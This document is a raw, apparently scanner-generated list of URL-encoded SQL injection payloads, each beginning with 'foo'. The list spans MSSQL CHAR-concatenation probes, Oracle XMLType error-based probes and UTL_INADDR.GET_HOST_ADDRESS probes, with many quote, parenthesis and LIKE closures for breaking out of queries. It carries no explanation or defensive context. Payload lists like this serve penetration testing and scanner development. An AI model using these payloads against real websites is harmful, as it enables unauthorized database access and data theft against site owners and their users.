foo%22%20AND%202192%20IN%20%28%28CHAR%2858%29%2BCHAR%28118%29%2BCHAR%28118%29%2BCHAR%28105%29%2BCHAR%2858%29%2B%28SELECT%20%28CASE%20WHEN%20%282192%3D2192%29%20THEN%20CHAR%2849%29%20ELSE%20CHAR%2848%29%20END%29%29%2BCHAR%2858%29%2BCHAR%28116%29%2BCHAR%28113%29%2BCHAR%28119%29%2BCHAR%2858%29%29%29%20AND%20%22vcuR%22%20LIKE%20%22vcuR foo%29%20WHERE%209079%3D9079%20AND%202192%20IN%20%28%28CHAR%2858%29%2BCHAR%28118%29%2BCHAR%28118%29%2BCHAR%28105%29%2BCHAR%2858%29%2B%28SELECT%20%28CASE%20WHEN%20%282192%3D2192%29%20THEN%20CHAR%2849%29%20ELSE%20CHAR%2848%29%20END%29%29%2BCHAR%2858%29%2BCHAR%28116%29%2BCHAR%28113%29%2BCHAR%28119%29%2BCHAR%2858%29%29%29 foo%27%29%20WHERE%207917%3D7917%20AND%202192%20IN%20%28%28CHAR%2858%29%2BCHAR%28118%29%2BCHAR%28118%29%2BCHAR%28105%29%2BCHAR%2858%29%2B%28SELECT%20%28CASE%20WHEN%20%282192%3D2192%29%20THEN%20CHAR%2849%29%20ELSE%20CHAR%2848%29%20END%29%29%2BCHAR%2858%29%2BCHAR%28116%29%2BCHAR%28113%29%2BCHAR%28119%29%2BCHAR%2858%29%29%29 foo%27%20WHERE%202480%3D2480%20AND%202192%20IN%20%28%28CHAR%2858%29%2BCHAR%28118%29%2BCHAR%28118%29%2BCHAR%28105%29%2BCHAR%2858%29%2B%28SELECT%20%28CASE%20WHEN%20%282192%3D2192%29%20THEN%20CHAR%2849%29%20ELSE%20CHAR%2848%29%20END%29%29%2BCHAR%2858%29%2BCHAR%28116%29%2BCHAR%28113%29%2BCHAR%28119%29%2BCHAR%2858%29%29%29 foo%22%20WHERE%208718%3D8718%20AND%202192%20IN%20%28%28CHAR%2858%29%2BCHAR%28118%29%2BCHAR%28118%29%2BCHAR%28105%29%2BCHAR%2858%29%2B%28SELECT%20%28CASE%20WHEN%20%282192%3D2192%29%20THEN%20CHAR%2849%29%20ELSE%20CHAR%2848%29%20END%29%29%2BCHAR%2858%29%2BCHAR%28116%29%2BCHAR%28113%29%2BCHAR%28119%29%2BCHAR%2858%29%29%29 foo%27%20%7C%7C%20%28SELECT%203631%20FROM%20DUAL%20WHERE%209234%3D9234%20AND%202192%20IN%20%28%28CHAR%2858%29%2BCHAR%28118%29%2BCHAR%28118%29%2BCHAR%28105%29%2BCHAR%2858%29%2B%28SELECT%20%28CASE%20WHEN%20%282192%3D2192%29%20THEN%20CHAR%2849%29%20ELSE%20CHAR%2848%29%20END%29%29%2BCHAR%2858%29%2BCHAR%28116%29%2BCHAR%28113%29%2BCHAR%28119%29%2BCHAR%2858%29%29%29%20%29%20%7C%7C%20%27 foo%27%20%7C%7C%20%28SELECT%205520%20WHERE%204074%3D4074%20AND%202192%20IN%20%28%28CHAR%2858%29%2BCHAR%28118%29%2BCHAR%28118%29%2BCHAR%28105%29%2BCHAR%2858%29%2B%28SELECT%20%28CASE%20WHEN%20%282192%3D2192%29%20THEN%20CHAR%2849%29%20ELSE%20CHAR%2848%29%20END%29%29%2BCHAR%2858%29%2BCHAR%28116%29%2BCHAR%28113%29%2BCHAR%28119%29%2BCHAR%2858%29%29%29%20%29%20%7C%7C%20%27 foo%20%2B%20%28SELECT%208893%20FROM%20DUAL%20WHERE%207677%3D7677%20AND%202192%20IN%20%28%28CHAR%2858%29%2BCHAR%28118%29%2BCHAR%28118%29%2BCHAR%28105%29%2BCHAR%2858%29%2B%28SELECT%20%28CASE%20WHEN%20%282192%3D2192%29%20THEN%20CHAR%2849%29%20ELSE%20CHAR%2848%29%20END%29%29%2BCHAR%2858%29%2BCHAR%28116%29%2BCHAR%28113%29%2BCHAR%28119%29%2BCHAR%2858%29%29%29%20%29 foo%20%2B%20%28SELECT%202416%20WHERE%203188%3D3188%20AND%202192%20IN%20%28%28CHAR%2858%29%2BCHAR%28118%29%2BCHAR%28118%29%2BCHAR%28105%29%2BCHAR%2858%29%2B%28SELECT%20%28CASE%20WHEN%20%282192%3D2192%29%20THEN%20CHAR%2849%29%20ELSE%20CHAR%2848%29%20END%29%29%2BCHAR%2858%29%2BCHAR%28116%29%2BCHAR%28113%29%2BCHAR%28119%29%2BCHAR%2858%29%29%29%20%29 foo%27%20%2B%20%28SELECT%20%27lArn%27%20FROM%20DUAL%20WHERE%204321%3D4321%20AND%202192%20IN%20%28%28CHAR%2858%29%2BCHAR%28118%29%2BCHAR%28118%29%2BCHAR%28105%29%2BCHAR%2858%29%2B%28SELECT%20%28CASE%20WHEN%20%282192%3D2192%29%20THEN%20CHAR%2849%29%20ELSE%20CHAR%2848%29%20END%29%29%2BCHAR%2858%29%2BCHAR%28116%29%2BCHAR%28113%29%2BCHAR%28119%29%2BCHAR%2858%29%29%29%20%29%20%2B%20%27 foo%27%20%2B%20%28SELECT%20%27sKpI%27%20WHERE%201634%3D1634%20AND%202192%20IN%20%28%28CHAR%2858%29%2BCHAR%28118%29%2BCHAR%28118%29%2BCHAR%28105%29%2BCHAR%2858%29%2B%28SELECT%20%28CASE%20WHEN%20%282192%3D2192%29%20THEN%20CHAR%2849%29%20ELSE%20CHAR%2848%29%20END%29%29%2BCHAR%2858%29%2BCHAR%28116%29%2BCHAR%28113%29%2BCHAR%28119%29%2BCHAR%2858%29%29%29%20%29%20%2B%20%27 foo%27%20IN%20BOOLEAN%20MODE%29%20AND%202192%20IN%20%28%28CHAR%2858%29%2BCHAR%28118%29%2BCHAR%28118%29%2BCHAR%28105%29%2BCHAR%2858%29%2B%28SELECT%20%28CASE%20WHEN%20%282192%3D2192%29%20THEN%20CHAR%2849%29%20ELSE%20CHAR%2848%29%20END%29%29%2BCHAR%2858%29%2BCHAR%28116%29%2BCHAR%28113%29%2BCHAR%28119%29%2BCHAR%2858%29%29%29%20%23 foo%29%20AND%201036%3D%28SELECT%20UPPER%28XMLType%28CHR%2860%29%7C%7CCHR%2858%29%7C%7CCHR%28118%29%7C%7CCHR%28118%29%7C%7CCHR%28105%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%281036%3D1036%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%2858%29%7C%7CCHR%28116%29%7C%7CCHR%28113%29%7C%7CCHR%28119%29%7C%7CCHR%2858%29%7C%7CCHR%2862%29%29%29%20FROM%20DUAL%29 foo%27%29%20AND%201036%3D%28SELECT%20UPPER%28XMLType%28CHR%2860%29%7C%7CCHR%2858%29%7C%7CCHR%28118%29%7C%7CCHR%28118%29%7C%7CCHR%28105%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%281036%3D1036%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%2858%29%7C%7CCHR%28116%29%7C%7CCHR%28113%29%7C%7CCHR%28119%29%7C%7CCHR%2858%29%7C%7CCHR%2862%29%29%29%20FROM%20DUAL%29 foo%27%20AND%201036%3D%28SELECT%20UPPER%28XMLType%28CHR%2860%29%7C%7CCHR%2858%29%7C%7CCHR%28118%29%7C%7CCHR%28118%29%7C%7CCHR%28105%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%281036%3D1036%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%2858%29%7C%7CCHR%28116%29%7C%7CCHR%28113%29%7C%7CCHR%28119%29%7C%7CCHR%2858%29%7C%7CCHR%2862%29%29%29%20FROM%20DUAL%29 foo%22%20AND%201036%3D%28SELECT%20UPPER%28XMLType%28CHR%2860%29%7C%7CCHR%2858%29%7C%7CCHR%28118%29%7C%7CCHR%28118%29%7C%7CCHR%28105%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%281036%3D1036%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%2858%29%7C%7CCHR%28116%29%7C%7CCHR%28113%29%7C%7CCHR%28119%29%7C%7CCHR%2858%29%7C%7CCHR%2862%29%29%29%20FROM%20DUAL%29 foo%29%20AND%201036%3D%28SELECT%20UPPER%28XMLType%28CHR%2860%29%7C%7CCHR%2858%29%7C%7CCHR%28118%29%7C%7CCHR%28118%29%7C%7CCHR%28105%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%281036%3D1036%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%2858%29%7C%7CCHR%28116%29%7C%7CCHR%28113%29%7C%7CCHR%28119%29%7C%7CCHR%2858%29%7C%7CCHR%2862%29%29%29%20FROM%20DUAL%29%20AND%20%286829%3D6829 foo%29%29%20AND%201036%3D%28SELECT%20UPPER%28XMLType%28CHR%2860%29%7C%7CCHR%2858%29%7C%7CCHR%28118%29%7C%7CCHR%28118%29%7C%7CCHR%28105%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%281036%3D1036%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%2858%29%7C%7CCHR%28116%29%7C%7CCHR%28113%29%7C%7CCHR%28119%29%7C%7CCHR%2858%29%7C%7CCHR%2862%29%29%29%20FROM%20DUAL%29%20AND%20%28%282163%3D2163 foo%29%29%29%20AND%201036%3D%28SELECT%20UPPER%28XMLType%28CHR%2860%29%7C%7CCHR%2858%29%7C%7CCHR%28118%29%7C%7CCHR%28118%29%7C%7CCHR%28105%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%281036%3D1036%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%2858%29%7C%7CCHR%28116%29%7C%7CCHR%28113%29%7C%7CCHR%28119%29%7C%7CCHR%2858%29%7C%7CCHR%2862%29%29%29%20FROM%20DUAL%29%20AND%20%28%28%286885%3D6885 foo%20AND%201036%3D%28SELECT%20UPPER%28XMLType%28CHR%2860%29%7C%7CCHR%2858%29%7C%7CCHR%28118%29%7C%7CCHR%28118%29%7C%7CCHR%28105%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%281036%3D1036%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%2858%29%7C%7CCHR%28116%29%7C%7CCHR%28113%29%7C%7CCHR%28119%29%7C%7CCHR%2858%29%7C%7CCHR%2862%29%29%29%20FROM%20DUAL%29 foo%27%29%20AND%201036%3D%28SELECT%20UPPER%28XMLType%28CHR%2860%29%7C%7CCHR%2858%29%7C%7CCHR%28118%29%7C%7CCHR%28118%29%7C%7CCHR%28105%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%281036%3D1036%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%2858%29%7C%7CCHR%28116%29%7C%7CCHR%28113%29%7C%7CCHR%28119%29%7C%7CCHR%2858%29%7C%7CCHR%2862%29%29%29%20FROM%20DUAL%29%20AND%20%28%27nHPY%27%3D%27nHPY foo%27%29%29%20AND%201036%3D%28SELECT%20UPPER%28XMLType%28CHR%2860%29%7C%7CCHR%2858%29%7C%7CCHR%28118%29%7C%7CCHR%28118%29%7C%7CCHR%28105%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%281036%3D1036%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%2858%29%7C%7CCHR%28116%29%7C%7CCHR%28113%29%7C%7CCHR%28119%29%7C%7CCHR%2858%29%7C%7CCHR%2862%29%29%29%20FROM%20DUAL%29%20AND%20%28%28%27RVCI%27%3D%27RVCI foo%27%29%29%29%20AND%201036%3D%28SELECT%20UPPER%28XMLType%28CHR%2860%29%7C%7CCHR%2858%29%7C%7CCHR%28118%29%7C%7CCHR%28118%29%7C%7CCHR%28105%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%281036%3D1036%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%2858%29%7C%7CCHR%28116%29%7C%7CCHR%28113%29%7C%7CCHR%28119%29%7C%7CCHR%2858%29%7C%7CCHR%2862%29%29%29%20FROM%20DUAL%29%20AND%20%28%28%28%27cNlJ%27%3D%27cNlJ foo%27%20AND%201036%3D%28SELECT%20UPPER%28XMLType%28CHR%2860%29%7C%7CCHR%2858%29%7C%7CCHR%28118%29%7C%7CCHR%28118%29%7C%7CCHR%28105%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%281036%3D1036%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%2858%29%7C%7CCHR%28116%29%7C%7CCHR%28113%29%7C%7CCHR%28119%29%7C%7CCHR%2858%29%7C%7CCHR%2862%29%29%29%20FROM%20DUAL%29%20AND%20%27qAjo%27%3D%27qAjo foo%27%29%20AND%201036%3D%28SELECT%20UPPER%28XMLType%28CHR%2860%29%7C%7CCHR%2858%29%7C%7CCHR%28118%29%7C%7CCHR%28118%29%7C%7CCHR%28105%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%281036%3D1036%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%2858%29%7C%7CCHR%28116%29%7C%7CCHR%28113%29%7C%7CCHR%28119%29%7C%7CCHR%2858%29%7C%7CCHR%2862%29%29%29%20FROM%20DUAL%29%20AND%20%28%27bXPb%27%20LIKE%20%27bXPb foo%27%29%29%20AND%201036%3D%28SELECT%20UPPER%28XMLType%28CHR%2860%29%7C%7CCHR%2858%29%7C%7CCHR%28118%29%7C%7CCHR%28118%29%7C%7CCHR%28105%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%281036%3D1036%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%2858%29%7C%7CCHR%28116%29%7C%7CCHR%28113%29%7C%7CCHR%28119%29%7C%7CCHR%2858%29%7C%7CCHR%2862%29%29%29%20FROM%20DUAL%29%20AND%20%28%28%27WMzX%27%20LIKE%20%27WMzX foo%27%29%29%29%20AND%201036%3D%28SELECT%20UPPER%28XMLType%28CHR%2860%29%7C%7CCHR%2858%29%7C%7CCHR%28118%29%7C%7CCHR%28118%29%7C%7CCHR%28105%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%281036%3D1036%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%2858%29%7C%7CCHR%28116%29%7C%7CCHR%28113%29%7C%7CCHR%28119%29%7C%7CCHR%2858%29%7C%7CCHR%2862%29%29%29%20FROM%20DUAL%29%20AND%20%28%28%28%27RsHr%27%20LIKE%20%27RsHr foo%27%20AND%201036%3D%28SELECT%20UPPER%28XMLType%28CHR%2860%29%7C%7CCHR%2858%29%7C%7CCHR%28118%29%7C%7CCHR%28118%29%7C%7CCHR%28105%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%281036%3D1036%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%2858%29%7C%7CCHR%28116%29%7C%7CCHR%28113%29%7C%7CCHR%28119%29%7C%7CCHR%2858%29%7C%7CCHR%2862%29%29%29%20FROM%20DUAL%29%20AND%20%27aLIr%27%20LIKE%20%27aLIr foo%22%29%20AND%201036%3D%28SELECT%20UPPER%28XMLType%28CHR%2860%29%7C%7CCHR%2858%29%7C%7CCHR%28118%29%7C%7CCHR%28118%29%7C%7CCHR%28105%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%281036%3D1036%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%2858%29%7C%7CCHR%28116%29%7C%7CCHR%28113%29%7C%7CCHR%28119%29%7C%7CCHR%2858%29%7C%7CCHR%2862%29%29%29%20FROM%20DUAL%29%20AND%20%28%22biOv%22%3D%22biOv foo%22%29%29%20AND%201036%3D%28SELECT%20UPPER%28XMLType%28CHR%2860%29%7C%7CCHR%2858%29%7C%7CCHR%28118%29%7C%7CCHR%28118%29%7C%7CCHR%28105%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%281036%3D1036%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%2858%29%7C%7CCHR%28116%29%7C%7CCHR%28113%29%7C%7CCHR%28119%29%7C%7CCHR%2858%29%7C%7CCHR%2862%29%29%29%20FROM%20DUAL%29%20AND%20%28%28%22JcNb%22%3D%22JcNb foo%22%29%29%29%20AND%201036%3D%28SELECT%20UPPER%28XMLType%28CHR%2860%29%7C%7CCHR%2858%29%7C%7CCHR%28118%29%7C%7CCHR%28118%29%7C%7CCHR%28105%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%281036%3D1036%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%2858%29%7C%7CCHR%28116%29%7C%7CCHR%28113%29%7C%7CCHR%28119%29%7C%7CCHR%2858%29%7C%7CCHR%2862%29%29%29%20FROM%20DUAL%29%20AND%20%28%28%28%22dqJv%22%3D%22dqJv foo%22%20AND%201036%3D%28SELECT%20UPPER%28XMLType%28CHR%2860%29%7C%7CCHR%2858%29%7C%7CCHR%28118%29%7C%7CCHR%28118%29%7C%7CCHR%28105%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%281036%3D1036%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%2858%29%7C%7CCHR%28116%29%7C%7CCHR%28113%29%7C%7CCHR%28119%29%7C%7CCHR%2858%29%7C%7CCHR%2862%29%29%29%20FROM%20DUAL%29%20AND%20%22gCTa%22%3D%22gCTa foo%22%29%20AND%201036%3D%28SELECT%20UPPER%28XMLType%28CHR%2860%29%7C%7CCHR%2858%29%7C%7CCHR%28118%29%7C%7CCHR%28118%29%7C%7CCHR%28105%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%281036%3D1036%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%2858%29%7C%7CCHR%28116%29%7C%7CCHR%28113%29%7C%7CCHR%28119%29%7C%7CCHR%2858%29%7C%7CCHR%2862%29%29%29%20FROM%20DUAL%29%20AND%20%28%22IwpF%22%20LIKE%20%22IwpF foo%22%29%29%20AND%201036%3D%28SELECT%20UPPER%28XMLType%28CHR%2860%29%7C%7CCHR%2858%29%7C%7CCHR%28118%29%7C%7CCHR%28118%29%7C%7CCHR%28105%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%281036%3D1036%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%2858%29%7C%7CCHR%28116%29%7C%7CCHR%28113%29%7C%7CCHR%28119%29%7C%7CCHR%2858%29%7C%7CCHR%2862%29%29%29%20FROM%20DUAL%29%20AND%20%28%28%22hmjc%22%20LIKE%20%22hmjc foo%22%29%29%29%20AND%201036%3D%28SELECT%20UPPER%28XMLType%28CHR%2860%29%7C%7CCHR%2858%29%7C%7CCHR%28118%29%7C%7CCHR%28118%29%7C%7CCHR%28105%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%281036%3D1036%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%2858%29%7C%7CCHR%28116%29%7C%7CCHR%28113%29%7C%7CCHR%28119%29%7C%7CCHR%2858%29%7C%7CCHR%2862%29%29%29%20FROM%20DUAL%29%20AND%20%28%28%28%22DNwW%22%20LIKE%20%22DNwW foo%22%20AND%201036%3D%28SELECT%20UPPER%28XMLType%28CHR%2860%29%7C%7CCHR%2858%29%7C%7CCHR%28118%29%7C%7CCHR%28118%29%7C%7CCHR%28105%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%281036%3D1036%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%2858%29%7C%7CCHR%28116%29%7C%7CCHR%28113%29%7C%7CCHR%28119%29%7C%7CCHR%2858%29%7C%7CCHR%2862%29%29%29%20FROM%20DUAL%29%20AND%20%22PdoR%22%20LIKE%20%22PdoR foo%29%20WHERE%208134%3D8134%20AND%201036%3D%28SELECT%20UPPER%28XMLType%28CHR%2860%29%7C%7CCHR%2858%29%7C%7CCHR%28118%29%7C%7CCHR%28118%29%7C%7CCHR%28105%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%281036%3D1036%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%2858%29%7C%7CCHR%28116%29%7C%7CCHR%28113%29%7C%7CCHR%28119%29%7C%7CCHR%2858%29%7C%7CCHR%2862%29%29%29%20FROM%20DUAL%29 foo%27%29%20WHERE%207728%3D7728%20AND%201036%3D%28SELECT%20UPPER%28XMLType%28CHR%2860%29%7C%7CCHR%2858%29%7C%7CCHR%28118%29%7C%7CCHR%28118%29%7C%7CCHR%28105%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%281036%3D1036%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%2858%29%7C%7CCHR%28116%29%7C%7CCHR%28113%29%7C%7CCHR%28119%29%7C%7CCHR%2858%29%7C%7CCHR%2862%29%29%29%20FROM%20DUAL%29 foo%27%20WHERE%205275%3D5275%20AND%201036%3D%28SELECT%20UPPER%28XMLType%28CHR%2860%29%7C%7CCHR%2858%29%7C%7CCHR%28118%29%7C%7CCHR%28118%29%7C%7CCHR%28105%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%281036%3D1036%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%2858%29%7C%7CCHR%28116%29%7C%7CCHR%28113%29%7C%7CCHR%28119%29%7C%7CCHR%2858%29%7C%7CCHR%2862%29%29%29%20FROM%20DUAL%29 foo%22%20WHERE%205665%3D5665%20AND%201036%3D%28SELECT%20UPPER%28XMLType%28CHR%2860%29%7C%7CCHR%2858%29%7C%7CCHR%28118%29%7C%7CCHR%28118%29%7C%7CCHR%28105%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%281036%3D1036%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%2858%29%7C%7CCHR%28116%29%7C%7CCHR%28113%29%7C%7CCHR%28119%29%7C%7CCHR%2858%29%7C%7CCHR%2862%29%29%29%20FROM%20DUAL%29 foo%27%20%7C%7C%20%28SELECT%207419%20FROM%20DUAL%20WHERE%208292%3D8292%20AND%201036%3D%28SELECT%20UPPER%28XMLType%28CHR%2860%29%7C%7CCHR%2858%29%7C%7CCHR%28118%29%7C%7CCHR%28118%29%7C%7CCHR%28105%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%281036%3D1036%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%2858%29%7C%7CCHR%28116%29%7C%7CCHR%28113%29%7C%7CCHR%28119%29%7C%7CCHR%2858%29%7C%7CCHR%2862%29%29%29%20FROM%20DUAL%29%20%29%20%7C%7C%20%27 foo%27%20%7C%7C%20%28SELECT%206180%20WHERE%201242%3D1242%20AND%201036%3D%28SELECT%20UPPER%28XMLType%28CHR%2860%29%7C%7CCHR%2858%29%7C%7CCHR%28118%29%7C%7CCHR%28118%29%7C%7CCHR%28105%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%281036%3D1036%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%2858%29%7C%7CCHR%28116%29%7C%7CCHR%28113%29%7C%7CCHR%28119%29%7C%7CCHR%2858%29%7C%7CCHR%2862%29%29%29%20FROM%20DUAL%29%20%29%20%7C%7C%20%27 foo%20%2B%20%28SELECT%207914%20FROM%20DUAL%20WHERE%209271%3D9271%20AND%201036%3D%28SELECT%20UPPER%28XMLType%28CHR%2860%29%7C%7CCHR%2858%29%7C%7CCHR%28118%29%7C%7CCHR%28118%29%7C%7CCHR%28105%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%281036%3D1036%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%2858%29%7C%7CCHR%28116%29%7C%7CCHR%28113%29%7C%7CCHR%28119%29%7C%7CCHR%2858%29%7C%7CCHR%2862%29%29%29%20FROM%20DUAL%29%20%29 foo%20%2B%20%28SELECT%207086%20WHERE%201677%3D1677%20AND%201036%3D%28SELECT%20UPPER%28XMLType%28CHR%2860%29%7C%7CCHR%2858%29%7C%7CCHR%28118%29%7C%7CCHR%28118%29%7C%7CCHR%28105%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%281036%3D1036%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%2858%29%7C%7CCHR%28116%29%7C%7CCHR%28113%29%7C%7CCHR%28119%29%7C%7CCHR%2858%29%7C%7CCHR%2862%29%29%29%20FROM%20DUAL%29%20%29 foo%27%20%2B%20%28SELECT%20%27SaSN%27%20FROM%20DUAL%20WHERE%205436%3D5436%20AND%201036%3D%28SELECT%20UPPER%28XMLType%28CHR%2860%29%7C%7CCHR%2858%29%7C%7CCHR%28118%29%7C%7CCHR%28118%29%7C%7CCHR%28105%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%281036%3D1036%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%2858%29%7C%7CCHR%28116%29%7C%7CCHR%28113%29%7C%7CCHR%28119%29%7C%7CCHR%2858%29%7C%7CCHR%2862%29%29%29%20FROM%20DUAL%29%20%29%20%2B%20%27 foo%27%20%2B%20%28SELECT%20%27iEPT%27%20WHERE%209582%3D9582%20AND%201036%3D%28SELECT%20UPPER%28XMLType%28CHR%2860%29%7C%7CCHR%2858%29%7C%7CCHR%28118%29%7C%7CCHR%28118%29%7C%7CCHR%28105%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%281036%3D1036%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%2858%29%7C%7CCHR%28116%29%7C%7CCHR%28113%29%7C%7CCHR%28119%29%7C%7CCHR%2858%29%7C%7CCHR%2862%29%29%29%20FROM%20DUAL%29%20%29%20%2B%20%27 foo%27%20IN%20BOOLEAN%20MODE%29%20AND%201036%3D%28SELECT%20UPPER%28XMLType%28CHR%2860%29%7C%7CCHR%2858%29%7C%7CCHR%28118%29%7C%7CCHR%28118%29%7C%7CCHR%28105%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%281036%3D1036%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%2858%29%7C%7CCHR%28116%29%7C%7CCHR%28113%29%7C%7CCHR%28119%29%7C%7CCHR%2858%29%7C%7CCHR%2862%29%29%29%20FROM%20DUAL%29%20%23 foo%29%20AND%207215%3DUTL_INADDR.GET_HOST_ADDRESS%28CHR%2858%29%7C%7CCHR%28118%29%7C%7CCHR%28118%29%7C%7CCHR%28105%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%287215%3D7215%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%2858%29%7C%7CCHR%28116%29%7C%7CCHR%28113%29%7C%7CCHR%28119%29%7C%7CCHR%2858%29%29 foo%27%29%20AND%207215%3DUTL_INADDR.GET_HOST_ADDRESS%28CHR%2858%29%7C%7CCHR%28118%29%7C%7CCHR%28118%29%7C%7CCHR%28105%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%287215%3D7215%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%2858%29%7C%7CCHR%28116%29%7C%7CCHR%28113%29%7C%7CCHR%28119%29%7C%7CCHR%2858%29%29 foo%27%20AND%207215%3DUTL_INADDR.GET_HOST_ADDRESS%28CHR%2858%29%7C%7CCHR%28118%29%7C%7CCHR%28118%29%7C%7CCHR%28105%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%287215%3D7215%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%2858%29%7C%7CCHR%28116%29%7C%7CCHR%28113%29%7C%7CCHR%28119%29%7C%7CCHR%2858%29%29 foo%22%20AND%207215%3DUTL_INADDR.GET_HOST_ADDRESS%28CHR%2858%29%7C%7CCHR%28118%29%7C%7CCHR%28118%29%7C%7CCHR%28105%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%287215%3D7215%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%2858%29%7C%7CCHR%28116%29%7C%7CCHR%28113%29%7C%7CCHR%28119%29%7C%7CCHR%2858%29%29 